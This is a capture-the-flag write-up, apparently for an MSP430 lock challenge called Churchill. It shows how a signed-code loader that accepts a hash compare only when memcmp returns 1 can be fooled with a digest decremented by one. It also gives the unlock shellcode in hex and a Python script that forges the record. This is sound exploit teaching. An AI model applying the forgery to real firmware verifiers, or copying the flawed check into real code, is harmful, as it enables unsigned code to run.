Churchill seems not to verify anything after 0xff bytes?

## Sample input

```hex
8000 00 06 3041 c26436953f8f3cadf1442fc218b185051ab6c20853a45f093fc32adf31529d05a5ec3e96a9e41ed9ad1b14dcbdb98e50e37a7ddc3d595b867807ed1605f2070e
```

## Layout

Loadaddr | Signature Type | length | payload | Signature
---------|----------------|--------|----------|----------
8000 | 00 (ed25519) | 06 | 3041 (`ret`) | c26436...
8000 | 01 (sha512) | 12 | 324000ff b0121000 | f009805ec519029923b72a6e63589a081295759bbf7e12090be7b784f622a24e135d2603b861cc0398b366b1a5d8a89836544a164c39f4e68361413ab6f049a5

The `12` in the length column is decimal (`0c` in hex, as written in the Payload section below). From the two samples, the length byte counts the whole record up to the signature: 4 header bytes (loadaddr, type, length) plus the payload, so 4 + 2 = `06` for the `ret` sample and 4 + 8 = `0c` for the unlock stub.

```asm
3240 00ff    mov #0xff00, sr
b012 1000    call #0x0010
```

## Payload

```hex
8000 01 0c 3240 00ff b012 1000
```

Hash (sha512):

```hex
80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec
```

complete payload:

```hex
8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec
```

# THE TWIST

The program explicitly checks for `0x1` when evaluating the result of the hash comparison. For two perfectly identical strings this DOESN'T WORK, because `memcmp` returns `0`.

Solution: subtract 1 from the last byte of the payload signature. The stored digest is then off by one, and when the program compares it against the digest it computed, the difference lands in r15 as `0x0001`, which is exactly what the check wants.

# Final Answer:

```hex
8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40eb
```
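Added example, not code from the original notes: a small Python script that rebuilds the record format described above (loadaddr | type | length | payload | sha512), recomputes the digest instead of trusting the value pasted on the page, applies the off-by-one trick, and models the flawed `== 1` check next to the correct `== 0` one so you can see why an honest digest is rejected and the forged one accepted. Assumptions, labelled in the comments too: the length byte counts the 4 header bytes plus the payload (inferred from the `06`/`0c` samples), the digest covers header + payload, the target's compare returns the difference of the first mismatching bytes, and the computed digest is the first `memcmp` argument (the order consistent with `0x0001` ending up in r15). The forge step goes one step beyond the notes: it decrements the last non-zero byte rather than blindly the last byte, so a digest ending in `0x00` does not wrap to `0xff` and turn the compare result into -255 instead of +1.

```python
import hashlib

# Field values taken from the notes above.
SIG_ED25519 = 0x00
SIG_SHA512 = 0x01
LOADADDR = bytes.fromhex("8000")                    # raw bytes, as written on the page
UNLOCK_PAYLOAD = bytes.fromhex("324000ffb0121000")  # mov #0xff00, sr ; call #0x0010
DIGEST_LEN = hashlib.sha512().digest_size           # 64


def build_header(loadaddr: bytes, sig_type: int, payload: bytes) -> bytes:
    """loadaddr (2) | type (1) | length (1).

    Inferred (assumption) from the two samples on the page: 06 for a 2-byte
    payload, 0c for an 8-byte one, so the length byte counts header + payload.
    """
    length = 4 + len(payload)
    if len(loadaddr) != 2 or length > 0xFF:
        raise ValueError("bad load address, or payload too long for a 1-byte length")
    return loadaddr + bytes([sig_type, length])


def craft_off_by_one(digest: bytes) -> bytes:
    """Copy of `digest` that a difference-based memcmp ranks exactly 1 below the real one.

    The notes decrement the last byte. Generalisation: decrement the last NON-ZERO
    byte, so a trailing 0x00 cannot wrap to 0xff (that would make the compare
    return -255, not +1). Bytes after the decremented one stay identical, so the
    first mismatch is the decremented byte.
    """
    forged = bytearray(digest)
    for i in range(len(forged) - 1, -1, -1):
        if forged[i] != 0:
            forged[i] -= 1
            return bytes(forged)
    raise ValueError("all-zero digest: nothing to decrement")


def build_record(loadaddr: bytes, payload: bytes, forge: bool = True) -> bytes:
    """header | payload | sha512.  Assumption: the digest covers header + payload,
    the order in which the page lists 'Payload', 'Hash', 'complete payload'."""
    hdr = build_header(loadaddr, SIG_SHA512, payload)
    digest = hashlib.sha512(hdr + payload).digest()
    if forge:
        digest = craft_off_by_one(digest)
    return hdr + payload + digest


def split_record(record: bytes):
    """Inverse of build_record: the length byte says where the signature starts."""
    length = record[3]
    if length < 4 or len(record) != length + DIGEST_LEN:
        raise ValueError("length byte does not match record size")
    return record[:4], record[4:length], record[length:]


def byte_diff_memcmp(a: bytes, b: bytes) -> int:
    """Model (assumption) of the target's compare as the notes describe it:
    the difference of the first mismatching bytes, 0 when identical."""
    for x, y in zip(a, b):
        if x != y:
            return x - y
    return 0


def recompute_digest(record: bytes) -> bytes:
    hdr, payload, _ = split_record(record)
    return hashlib.sha512(hdr + payload).digest()


def flawed_check(record: bytes) -> bool:
    """The bug: accept only when memcmp(computed, stored) == 1.
    Argument order (computed first) is an assumption consistent with
    '0x0001 in r15' in the notes."""
    _, _, stored = split_record(record)
    return byte_diff_memcmp(recompute_digest(record), stored) == 1


def correct_check(record: bytes) -> bool:
    """What the check should have been: identical digests, memcmp == 0."""
    _, _, stored = split_record(record)
    return byte_diff_memcmp(recompute_digest(record), stored) == 0


if __name__ == "__main__":
    honest = build_record(LOADADDR, UNLOCK_PAYLOAD, forge=False)
    forged = build_record(LOADADDR, UNLOCK_PAYLOAD, forge=True)
    print("honest record passes flawed check:", flawed_check(honest))
    print("forged record passes flawed check:", flawed_check(forged))
    print("send this:", forged.hex())
```

Running the script prints the record to submit; compare its first 12 bytes with the `complete payload` above and its digest with the `Hash` line to confirm the header/payload reading of the notes, then confirm only the forged record passes `flawed_check` while only the honest one passes `correct_check`.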